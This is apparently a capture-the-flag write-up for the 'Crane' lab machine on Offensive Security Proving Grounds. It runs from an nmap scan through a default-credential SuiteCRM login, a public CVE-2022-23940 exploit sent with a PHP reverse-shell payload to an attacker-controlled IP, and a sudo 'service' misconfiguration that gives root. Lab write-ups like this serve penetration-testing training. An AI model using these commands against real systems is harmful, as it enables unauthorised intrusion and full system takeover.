Crane

Writeup for Crane from Offensive Security Proving Grounds (PG)

Enumeration

nmap scan:

Command executed: nmap -Pn -p- -A -T3 –open 192.168.183.146

 

 

Initial Access – Foothold

Browsing to the web server we located on our previous nmap scans shows a SuiteCRM management login prompt. 

http://192.168.183.146

 

 

We used the default credentials for SuiteCRM admin:admin which gives us administrator access to the management system. 

 

 

Checking the SuiteCRM version once logged in under “about” showed version 7.12.3 

 

 

Google Search verifies SuiteCRM version 7.12.3 has a valid working exploit.

 

 

Exploitation

Downloaded exploit to kali box:

Command Executed: git clone https://github.com/manuelz120/CVE-2022-23940

 

We initiated a listener on our Kali box using rlwrap and netcat.

Command executed: rlwrap nc -lvnp 7777

 

 

executed payload from kali box:

Command executed:  ./exploit.py -h http://192.168.183.146 -u admin -p admin –payload “php -r ‘\$sock=fsockopen(\”192.168.45.247\”, 7777); exec(\”/bin/sh -i <&3 >&3 2>&3\”);'”

 

 

received reverse shell as “www-data” user

 

 

Privilege Escalation

Further enumeration of the command sudo -l lead me to a misconfiguration it allowed the user www-data to execute /usr/sbin/service with root privileges without requiring a password.

 

executed the following command which gives us root access:

Command executed: sudo /usr/sbin/service ../../bin/sh

Scroll to Top